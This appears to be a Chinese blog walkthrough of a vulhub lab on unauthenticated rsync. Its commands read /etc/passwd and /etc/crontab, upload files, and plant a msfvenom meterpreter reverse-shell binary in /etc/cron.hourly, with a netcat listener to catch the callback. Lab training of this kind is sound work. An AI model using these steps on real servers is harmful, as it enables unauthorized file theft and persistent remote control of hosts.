首页 > 其他分享 >【vulhub靶场之rsync关】

【vulhub靶场之rsync关】

时间:2024-08-06 20:55:42浏览次数:8  
标签:vulhub src rsync shell 文件 kali 873 靶场

一、使用nmap模块查看该ip地址有没有Rsync未授权访问漏洞

nmap -p 873 --script rsync-list-modules 加IP地址

查看到是有漏洞的模块的

image-20240805155648842

二、使用rsync命令连接并读取文件

image-20240805160205714

查看src目录里面的信息。

image-20240805160717745

三、对系统中的敏感文件进行下载——/etc/passwd

执行命令:

rsync rsync://43.136.68.40:873/src/etc/passwd /home/kali/Desktop/

image-20240805181956106

查看下载下的文件

cat /home/kali/Desktop/passwd

image-20240805182157837

也可在桌面双击打开

image-20240805182307279

四、在本机使用命令创建一个phpinfo文件

随便往里面写一个文件测试一下,例如phpinfo.php,如下命令在kali创建一个文件。

 echo "" > phpinfo.php 

将文件再上传到受害者,也就是靶场环境里。

rsync ./phpinfo.php rsync://43.136.68.40:873/src/home/

查看一下有没有写进去

rsync rsync://43.136.68.40:873/src/home/

成功写进去了文件。

image-20240805190256114

五、反弹shell

查看定时任务

rsync://43.136.68.40:873/src/etc/crontab

将文件下载下到kali

rsync rsync://43.136.68.40:873/src/etc/crontab /home/kali/Desktop
​

查看一下文件里面的内容,里面的大概意思就是每17分钟调用一次/etc/cron.hourly

image-20240805191157593

在kali机子上拉取一个shell文件

语法:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=自己攻击机的地址 lport=4444 --f elf -o shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.168.189.150 lport=4444 --f elf -o shell

image-20240805212012471

将shell文件提权

chmod 777 shell

六:将shell上传到目标靶机中

命令语句:

rsync -av /home/kali/Desktop/shell rsync://43.136.68.40:873/src/etc/cron.hourly

image-20240805213313658

七、开启kali监听端口

nc -lvvp 4444

等待17分钟后,查看监听到的信息,代表连接成功。

标签:vulhub,src,rsync,shell,文件,kali,873,靶场
From: https://blog.csdn.net/weixin_57240513/article/details/140938555

相关文章

  • basic_pentesting_2靶场实战【超详细】
    下载链接:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz一、靶场配置网卡配置为nat二、主机探测与端口扫描nmap192.168.121.0/24 开放了22、80、31337端口nmap192.168.121.188-p--A-sV-Pn 访问80web服务 提示跟随白色兔子f12......
  • CVE-2023-7130漏洞靶场复现
    CollegeNotesGallery2.0允许通过“/notes/login.php”中的参数‘user’进行SQL注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.抓登录包放sqlmap爆破直接--dump一把梭哈......
  • CVE-2023-0562银行储物柜管理系统登录页面sql注入漏洞靶场复现
    在PHPGurukul银行储物柜管理系统1.0中发现了一个漏洞。它被评定为临界状态。受此问题影响的是组件登录的文件index.php的一些未知功能。对参数username的操作会导致sql注入。攻击可能是远程发起的。该漏洞已被公开,并可能被利用。此漏洞的标识符是VDB-219716。抓登录包放salmap......
  • cockpit <=2.4.1 后台任意文件上传漏洞靶场复现(CVE-2023-1313)
    cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装主页界面使用admin/admin登录不了根据提示访问/install后自动创建admin/admin,再次登录可以找到一个上传点,上传phpinfo并burp抓包具体路径可以在上传后有个下载按钮,会看到完整的访问......
  • basic_pentesting_1靶场实战[超详细]
    下载地址:https://download.vulnhub.com/depth/DepthB2R.ova一、靶场配置网卡模式设置为nat二、主机探测与端口扫描nmap192.168.121.0/24 ip地址为192.168.121.186,开启了21、22、80端口扫描一下端口信息nmap192.168.121.186-sV-A-p- 访问一下80web服务看看......
  • DepthB2R靶场实战【超详细】
    下载地址:https://download.vulnhub.com/depth/DepthB2R.ova一、主机探测与端口扫描nmap192.168.121.0/24 发现开启了8080端口我们对该端口进行扫描nmap192.168.121.187-p--A-Pn-sV 访问其8080web服务二、getshell目录扫描dirsearch-uhttp://192.168.121......
  • SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)靶场复现
    SourceCodesterPurchaseOrderManagementSystemv1.0是一个实用的工具,适合希望优化采购流程的企业和组织靶场界面直接放sqlmap跑爆数据库爆数据表爆字段爆内容-用户名爆内容-密码sqlmap的md5碰撞sqlmap所有命令点击查看代码爆数据库pythonsqlmap.py-u......
  • Jorani远程命令执行漏洞 CVE-2023-26469靶场复现
    靶场界面点击查看exp↓↓↓"""vulnerabilitycoveredbyCVE-2023-26469"""importreadlineimportrequestsimportdatetimeimportsysimportreimportbase64importrandomimportstringrequests.packages.urllib3.disable_warnings(requ......
  • 文件服务器rsync
    服务器配置echo"cc:cc2023">/etc/rsync.passwordchmod600/etc/rsync.passwordvi/etc/rsyncd.confuid=rootgid=rootusechroot=nomaxconnections=40pidfile=/var/run/rsyncd.pidlogfile=/var/log/rsyncd.logexclude=lost+found/tran......
  • 网络靶场搭建教程
    例:搭建网络靶场是一个复杂的过程,涉及到多个步骤和工具。以下提供的教程是主要概述:1. 准备工作:首先需要选择一个操作系统,例如Ubuntu20.464位,并确保系统环境满足搭建靶场的要求。如果没有Docker基础,可以先通过相关视频教程进行学习。2. 安装Docker:使用官方安装脚本自动安......